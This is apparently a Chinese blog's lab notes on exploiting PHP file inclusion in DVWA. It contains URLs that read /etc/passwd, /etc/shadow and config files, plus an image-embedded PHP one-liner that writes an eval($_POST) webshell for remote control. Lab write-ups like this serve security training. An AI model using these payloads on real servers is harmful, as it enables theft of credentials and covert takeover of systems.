黑客攻防笔记Day02

文件包含漏洞渗透攻击

1. 项目实验环境

 

2、原理及危害

文件包含漏洞:即File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以
通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,
此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远
程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项(选项开启之后,服务器允许包含一
个远程的文件)。服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含
一个恶意文件,而我们可以构造这个恶意文件来达到自己的目的。
1. 文件包含(File Inclusion)即程序通过[包含函数]调用本地或远程文件,以此来实现拓展功能 2. 被包含的文件可以是各种文件格式,而当文件里面包含恶意代码,则会形成远程命令执行或文件上传漏洞 3. 文件包含漏洞主要发生在有包含语句的环境中,例如PHP所具备include、require等包含函数 文件包含分为两类: 本地文件包含LFI(Local File Inclusion) 当被包含的文件在服务器本地时,就形成本地文件包含 远程文件包含RFI(Remote File Inclusion) 当被包含的文件在第三方服务器时,叫做远程文件包含

 3、低安全级别渗透

 

 

3.1本地文件包含

访问本地系统账号信息及其它敏感信息 
http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/passwd

http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/shadow

http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/php5/apache2/php.ini

http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/mysql/my.cnf

http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/apache2/apache2.conf
 

 

3.2 本地文件包含+webshell

1. 制作一句话图片木马 eg. yangjie.jpg 
<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[yangjie]);?>')?>
2. 上传图片木马文件

3. 执行文件包含并生成后门

4. 通过菜刀连接webshell
杨哥提示: /var/www/dvwa/hackable/uploads //dvwa文件上传访问的目录
yangge.jpg /var/www/dvwa/vulnerabilities/fi
//dvwa文件包含访问的目录 shell20.php

制作一句话木马

 

上传图片木马文件

 

 执行文件包含并生成后门

http://192.168.208.140/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/2.jpg
或者使用该图片的绝对路径
http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/var/www/dvwa/hackable/uploads /2.jpg
 

 

 通过菜刀链接webshell

http://192.168.208.140/dvwa/vulnerabilities/fi/shell20.php
 

 

 3.3远程文件包含+webshell

建立远程服务器,本项目使用kali作为远程服务器

 

验证远程服务器提供文件正常

 

 

 用蚁剑远程连接控制

 

4、中安全级别渗透

 

 4.1本地文件包含

同低级别一样,仍然能执行低级别的漏洞利用
http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/passwd 

http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/shadow 

http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/php5/apache2/php.ini 

http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/mysql/my.cnf 

http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/apache2/apache2.conf

 

 

 4.2本地文件包含+webshell

同低安全级别一样

1.制作一句话木马
<?fputs(fopen("shell200.php","w"),'<?php eval($_POST[yangjie]);?>')?> 
2. 上传图片木马文件
3. 执行文件包含并生成后门
4. 通过菜刀连接webshell

制作一句木马

 

上传图片木马文件

 

执行文件包含并生成后门

http://192.168.208.140/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/hlw.jpg
或者使用该图片的绝对路径

 

 

 

 

 4.3远程文件包含+webshell

建立远程服务器,本项目使用kali 作为远程服务器

 

 

 

 

 蚁剑远程连接

 

 5.高安全级别渗透同上面两种一样

 
原文地址:https://www.cnblogs.com/Leisy/p/14643143.html